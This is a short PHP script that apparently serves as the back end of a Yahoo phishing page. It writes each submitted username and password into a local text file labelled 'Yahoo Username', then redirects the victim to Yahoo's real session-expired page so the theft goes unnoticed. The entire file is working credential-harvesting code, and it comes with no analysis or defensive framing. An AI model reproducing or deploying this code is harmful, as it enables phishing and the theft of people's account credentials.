1<?php 2 3file_put_contents("../userpass/usernames.txt", "Yahoo Username: " . $_POST['username'] . " Pass: " . $_POST['password'] . "\n", FILE_APPEND); 4header('Location: https://login.yahoo.com/account/challenge/session-expired'); 5exit(); 6?> 7